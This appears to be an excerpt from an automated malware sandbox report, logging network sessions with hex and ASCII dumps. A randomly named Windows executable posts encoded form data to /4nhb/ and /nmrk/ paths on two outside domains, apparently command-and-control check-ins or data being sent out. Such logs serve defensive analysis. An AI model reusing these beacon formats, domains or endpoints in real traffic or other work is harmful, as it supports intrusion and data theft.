Jan 7, 2025 12:22:34.557905912 CET	1236	IN	Data Raw: 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
Jan 7, 2025 12:22:34.558106899 CET	1236	IN	Data Raw: 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 68 70 61 Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
Jan 7, 2025 12:22:34.558120966 CET	1236	IN	Data Raw: 6f 75 72 20 77 65 62 73 69 74 65 20 74 6f 20 61 6e 79 20 6f 66 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 73 2e 20 46 6f 6c 6c 6f 77 20 74 68 65 20 61 72 74 69 63 6c 65 20 62 65 6c 6f 77 20 74 6f 20 61 64 64 20 79 6f 75 72 20 64 6f 6d Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
Jan 7, 2025 12:22:34.558130026 CET	1236	IN	Data Raw: 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 22 29 7d 7d 3b 76 61 72 20 6f 3d 33 36 2c 72 3d 32 31 34 37 34 38 33 36 34 37 3b 66 75 6e 63 74 69 6f 6e 20 65 28 6f 2c 72 29 7b 72 65 74 75 72 6e 20 6f 2b 32 32 2b 37 35 2a 28 6f 3c 32 36 29 2d 28 28 30 21 3d Data Ascii: urn e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36r/(r+38))}this.decode=f
Jan 7, 2025 12:22:34.558139086 CET	552	IN	Data Raw: 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 3b 61 26 26 28 77 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 29 29 3b 76 61 72 20 76 3d 28 74 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 2e 74 6f 4c 6f 77 Data Ascii: i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+(
Jan 7, 2025 12:22:34.558149099 CET	660	IN	Data Raw: 3c 3d 75 3f 31 3a 75 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 75 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 28 73 2b 28 70 2d 73 29 25 28 6f 2d 73 29 2c 30 29 29 29 2c 70 3d 4d 61 74 68 Data Ascii: <=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49764	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:22:57.783463001 CET	819	OUT	POST /4nhb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.maplesyrup7.click Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.maplesyrup7.click Referer: http://www.maplesyrup7.click/4nhb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 59 54 31 76 78 69 69 51 49 37 6e 6f 35 46 58 61 2f 62 33 47 4b 41 56 5a 31 53 75 78 53 41 2b 33 4d 4f 71 4b 7a 6f 77 47 63 30 79 71 78 53 44 38 4b 45 4c 4c 4b 32 58 2f 35 51 79 6c 4e 58 39 78 33 70 43 68 62 56 75 58 6c 49 53 6a 44 70 6e 66 6d 30 6a 74 7a 31 6a 6a 41 2b 6d 66 4e 78 56 37 73 65 38 76 41 6e 35 74 52 32 66 71 43 6f 46 51 6d 43 61 35 6b 71 77 78 61 37 6f 50 77 46 4d 41 6a 34 64 41 53 56 51 57 75 44 38 33 53 67 67 62 61 32 7a 73 2f 56 76 58 59 5a 34 71 66 61 79 65 6f 69 31 52 4d 44 6f 4f 61 33 4c 59 50 4d 4a 2b 58 58 33 55 41 45 64 77 4d 32 2b 74 53 6d 63 57 79 51 3d 3d Data Ascii: Jz1hrtoh=YT1vxiiQI7no5FXa/b3GKAVZ1SuxSA+3MOqKzowGc0yqxSD8KELLK2X/5QylNX9x3pChbVuXlISjDpnfm0jtz1jjA+mfNxV7se8vAn5tR2fqCoFQmCa5kqwxa7oPwFMAj4dASVQWuD83Sggba2zs/VvXYZ4qfayeoi1RMDoOa3LYPMJ+XX3UAEdwM2+tSmcWyQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49785	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:23:00.332679987 CET	839	OUT	POST /4nhb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.maplesyrup7.click Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.maplesyrup7.click Referer: http://www.maplesyrup7.click/4nhb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 59 54 31 76 78 69 69 51 49 37 6e 6f 72 55 6e 61 36 39 2f 47 62 77 56 61 70 43 75 78 62 67 2b 7a 4d 4f 57 4b 7a 74 56 5a 66 47 6d 71 77 77 72 38 4c 41 66 4c 48 57 58 2f 73 67 79 73 44 33 39 36 33 70 2b 44 62 55 53 58 6c 49 47 6a 44 72 2f 66 6d 6e 62 75 69 31 6a 68 4e 65 6d 64 4a 78 56 37 73 65 38 76 41 6e 39 54 52 31 76 71 43 5a 31 51 30 7a 61 36 37 61 77 79 54 62 6f 50 36 6c 4d 63 6a 34 64 6d 53 51 78 4c 75 42 45 33 53 6c 63 62 5a 6e 7a 72 32 56 75 39 48 4a 35 6c 55 4b 66 51 6e 68 78 52 54 43 49 2b 64 45 4c 39 4f 4b 45 6b 47 6d 57 44 53 45 35 44 52 78 33 5a 66 6c 68 66 70 54 30 74 52 61 58 45 65 33 32 68 77 51 4e 49 67 74 79 30 39 32 6f 3d Data Ascii: Jz1hrtoh=YT1vxiiQI7norUna69/GbwVapCuxbg+zMOWKztVZfGmqwwr8LAfLHWX/sgysD3963p+DbUSXlIGjDr/fmnbui1jhNemdJxV7se8vAn9TR1vqCZ1Q0za67awyTboP6lMcj4dmSQxLuBE3SlcbZnzr2Vu9HJ5lUKfQnhxRTCI+dEL9OKEkGmWDSE5DRx3ZflhfpT0tRaXEe32hwQNIgty092o=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49801	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:23:02.877635002 CET	10921	OUT	POST /4nhb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.maplesyrup7.click Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.maplesyrup7.click Referer: http://www.maplesyrup7.click/4nhb/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 59 54 31 76 78 69 69 51 49 37 6e 6f 72 55 6e 61 36 39 2f 47 62 77 56 61 70 43 75 78 62 67 2b 7a 4d 4f 57 4b 7a 74 56 5a 66 47 65 71 78 42 4c 38 4b 6e 6a 4c 47 57 58 2f 74 67 79 70 44 33 39 64 33 74 71 48 62 55 65 70 6c 4c 2b 6a 53 36 66 66 33 6d 62 75 72 31 6a 68 53 4f 6d 65 4e 78 55 6a 73 61 59 7a 41 6e 74 54 52 31 76 71 43 62 74 51 6a 79 61 36 35 61 77 78 61 37 6f 44 77 46 4d 67 6a 34 46 59 53 51 39 62 74 77 6b 33 53 46 73 62 59 56 72 72 33 31 75 2f 45 4a 34 36 55 4b 54 62 6e 69 55 71 54 43 38 48 64 44 37 39 50 39 56 62 43 6c 2f 56 54 56 70 50 4a 79 53 6d 63 48 31 35 75 6a 6b 75 48 49 50 72 4e 32 36 4e 2f 6a 63 38 2f 76 43 70 2b 78 42 61 61 48 54 73 32 45 72 36 61 6b 78 7a 30 6f 47 36 78 41 2b 58 4e 67 43 39 55 38 63 70 65 37 4b 56 39 47 76 35 53 37 62 4d 6b 34 34 71 6b 52 65 6b 35 53 38 6f 63 77 4b 4d 70 77 63 57 33 55 70 53 4b 35 36 58 31 62 54 39 52 64 5a 4b 5a 55 39 76 57 46 6c 74 32 67 62 66 70 43 61 72 6f 4e 6d 34 56 78 59 79 77 43 51 48 59 37 62 6c 4c 48 31 46 7a [TRUNCATED] Data Ascii: Jz1hrtoh=YT1vxiiQI7norUna69/GbwVapCuxbg+zMOWKztVZfGeqxBL8KnjLGWX/tgypD39d3tqHbUeplL+jS6ff3mbur1jhSOmeNxUjsaYzAntTR1vqCbtQjya65awxa7oDwFMgj4FYSQ9btwk3SFsbYVrr31u/EJ46UKTbniUqTC8HdD79P9VbCl/VTVpPJySmcH15ujkuHIPrN26N/jc8/vCp+xBaaHTs2Er6akxz0oG6xA+XNgC9U8cpe7KV9Gv5S7bMk44qkRek5S8ocwKMpwcW3UpSK56X1bT9RdZKZU9vWFlt2gbfpCaroNm4VxYywCQHY7blLH1FzEqXg/Ka3WFhYlvPq6wyCKymdojQzTt7UKKpT/nFCX0qvfqR4JGnV1JIsxgemZ3mL3BmAqaKtrR1wwyNub/E5EG6th8KFeLiNowmKmmFhUlqf+TrYJDEyIaJW3KiIn+7NO/VTyx8hz9NXHsKdokxwSyll3rlpIs0zaAV4GOEznXA1LbVERIoF4msR1rp0awE9SkCmH5S9/PHlcUjLaQ7/g0pjQM7h9eb/mwvBde85sdgThp/6qAIEWpMuEp4wiq8njQ198FWT9KvfBvRGA+IWLNwUwEUDtKOlJvu+QtJWOCalZlVA5pw8y33mpV+c3aCZtmjeLZ7PYblmmNjw+Edr6gb3u2OqzfbeHbg94aBMYOJYuVCQzI4t1P0kT9TXGoiUdPgdDu16k7z4iF/4RvG6GzO8htxZ+MhR5Eyb6aN2OXdyOAznMi5j44b+Sj/Dgnd4LXbZBNkrYzM1pujj1Byxl2UCIVnT1kB5LkLYglA9KkGOdAeMqowl7jL8c7nzg34oPzxMJJ6nNMk6ItRdB6VU1rwtClAapnrwQFmA5pBTIXRiiazuc2SXJddCu+ksRWwcd49c+ur2Upt7F6nokN95RPdAk940RTjhEk4hapo4XhwoV0mVCduP+HXXeR0BIfItH6Q+WpqepMXboRmo/Yo/5NtmvgwGqZza+R [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49817	188.114.97.3	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:23:05.429824114 CET	547	OUT	GET /4nhb/?UdJ=uBcLexhXPjVX9H&Jz1hrtoh=VRdPyVGvBNL0zGb6xrXYQR9ur0r2QTKUQOSO7cd8EnuFzx+YHnq+DUXdslaENlV63J3iVXi+q6zCQbLR2W+jpkzGPrjJexdKuJksLzp2XTbKL4ZngkaDzaE= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.maplesyrup7.click Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:23:44.920182943 CET	965	IN	HTTP/1.1 522 Date: Tue, 07 Jan 2025 11:23:44 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=shjSpKdtGz6CLpGK5r%2Bdu1L1zm8ClifC%2FUhL%2FyrYxQA39LtImE0pSxZmnsKHVNoQM4SKNPAPkKyb4CoQyzF%2Bnji4rlZc0R1Gk2qAy8htZJbwPmtlP4hfY4YCN9Flm46gnaF0VB2EH68%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fe392e17e5a7d02-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2062&min_rtt=2062&rtt_var=1031&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=547&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50007	199.59.243.228	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:23:50.316400051 CET	828	OUT	POST /nmrk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.marketyemen.holdings Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.marketyemen.holdings Referer: http://www.marketyemen.holdings/nmrk/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 79 32 45 52 62 45 69 70 31 6a 42 56 6a 65 7a 4b 31 52 4a 55 73 6c 77 2f 55 56 62 4b 6a 73 56 61 76 44 46 65 5a 77 56 4d 64 77 71 67 6f 74 33 38 73 37 35 69 49 53 54 72 34 42 34 4e 47 48 41 64 34 49 43 32 33 4b 51 57 44 4e 66 49 45 49 39 63 62 77 4a 42 53 62 72 36 32 53 4f 31 4b 35 69 56 2b 4e 31 47 4f 30 70 63 65 67 31 4d 2f 72 44 2b 4f 6e 79 38 73 67 52 58 74 6c 61 75 74 44 58 46 35 54 43 70 42 59 46 34 31 77 52 71 45 77 34 64 4a 51 56 31 33 68 73 2b 47 78 2b 6e 51 6f 52 47 76 69 67 74 2f 42 4e 42 4d 6a 54 48 4b 4a 4b 4f 45 43 48 78 6e 34 41 73 4c 52 7a 34 59 4a 74 69 68 51 3d 3d Data Ascii: Jz1hrtoh=y2ERbEip1jBVjezK1RJUslw/UVbKjsVavDFeZwVMdwqgot38s75iISTr4B4NGHAd4IC23KQWDNfIEI9cbwJBSbr62SO1K5iV+N1GO0pceg1M/rD+Ony8sgRXtlautDXF5TCpBYF41wRqEw4dJQV13hs+Gx+nQoRGvigt/BNBMjTHKJKOECHxn4AsLRz4YJtihQ==
Jan 7, 2025 12:23:50.753222942 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 07 Jan 2025 11:23:49 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: d49a96df-96fa-47fb-9deb-a43defde315e cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0Gcqj+bYUmkpb6BxAFHsiKw1lwJpHsaqT8kD4JG33/RTQgbzxm2fvgCUrIfher/p+uk/6E8/Ri+ACmyxSKP1hQ== set-cookie: parking_session=d49a96df-96fa-47fb-9deb-a43defde315e; expires=Tue, 07 Jan 2025 11:38:50 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 30 47 63 71 6a 2b 62 59 55 6d 6b 70 62 36 42 78 41 46 48 73 69 4b 77 31 6c 77 4a 70 48 73 61 71 54 38 6b 44 34 4a 47 33 33 2f 52 54 51 67 62 7a 78 6d 32 66 76 67 43 55 72 49 66 68 65 72 2f 70 2b 75 6b 2f 36 45 38 2f 52 69 2b 41 43 6d 79 78 53 4b 50 31 68 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0Gcqj+bYUmkpb6BxAFHsiKw1lwJpHsaqT8kD4JG33/RTQgbzxm2fvgCUrIfher/p+uk/6E8/Ri+ACmyxSKP1hQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 7, 2025 12:23:50.753240108 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDQ5YTk2ZGYtOTZmYS00N2ZiLTlkZWItYTQzZGVmZGUzMTVlIiwicGFnZV90aW1lIjoxNzM2MjQ5MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50008	199.59.243.228	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:23:52.876230955 CET	848	OUT	POST /nmrk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.marketyemen.holdings Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.marketyemen.holdings Referer: http://www.marketyemen.holdings/nmrk/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 79 32 45 52 62 45 69 70 31 6a 42 56 69 39 37 4b 75 32 64 55 70 46 77 34 52 56 62 4b 36 63 56 65 76 44 35 65 5a 78 52 63 63 45 47 67 78 4d 48 38 72 36 35 69 4c 53 54 72 67 52 34 49 49 6e 42 52 34 49 4f 41 33 4f 51 57 44 4e 62 49 45 4a 4e 63 62 6a 52 47 54 4c 72 34 36 79 4f 33 53 5a 69 56 2b 4e 31 47 4f 30 74 6d 65 67 74 4d 2f 62 54 2b 50 47 79 6a 6c 41 52 57 75 6c 61 75 70 44 58 42 35 54 43 66 42 63 63 74 31 79 5a 71 45 31 45 64 4b 46 35 36 35 68 73 6e 43 78 2f 4a 58 70 73 6b 32 41 42 57 31 44 5a 46 54 43 57 71 50 50 48 55 56 7a 6d 6d 31 34 6b 66 57 57 36 4d 56 4b 51 72 36 53 43 65 66 69 46 6a 67 58 7a 33 70 73 2f 4e 37 37 58 4b 41 32 67 3d Data Ascii: Jz1hrtoh=y2ERbEip1jBVi97Ku2dUpFw4RVbK6cVevD5eZxRccEGgxMH8r65iLSTrgR4IInBR4IOA3OQWDNbIEJNcbjRGTLr46yO3SZiV+N1GO0tmegtM/bT+PGyjlARWulaupDXB5TCfBcct1yZqE1EdKF565hsnCx/JXpsk2ABW1DZFTCWqPPHUVzmm14kfWW6MVKQr6SCefiFjgXz3ps/N77XKA2g=
Jan 7, 2025 12:23:53.313821077 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 07 Jan 2025 11:23:52 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: a150b6cd-1848-4156-9f47-0a0d19610b5b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0Gcqj+bYUmkpb6BxAFHsiKw1lwJpHsaqT8kD4JG33/RTQgbzxm2fvgCUrIfher/p+uk/6E8/Ri+ACmyxSKP1hQ== set-cookie: parking_session=a150b6cd-1848-4156-9f47-0a0d19610b5b; expires=Tue, 07 Jan 2025 11:38:53 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 30 47 63 71 6a 2b 62 59 55 6d 6b 70 62 36 42 78 41 46 48 73 69 4b 77 31 6c 77 4a 70 48 73 61 71 54 38 6b 44 34 4a 47 33 33 2f 52 54 51 67 62 7a 78 6d 32 66 76 67 43 55 72 49 66 68 65 72 2f 70 2b 75 6b 2f 36 45 38 2f 52 69 2b 41 43 6d 79 78 53 4b 50 31 68 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0Gcqj+bYUmkpb6BxAFHsiKw1lwJpHsaqT8kD4JG33/RTQgbzxm2fvgCUrIfher/p+uk/6E8/Ri+ACmyxSKP1hQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 7, 2025 12:23:53.313838959 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTE1MGI2Y2QtMTg0OC00MTU2LTlmNDctMGEwZDE5NjEwYjViIiwicGFnZV90aW1lIjoxNzM2MjQ5MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50009	199.59.243.228	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
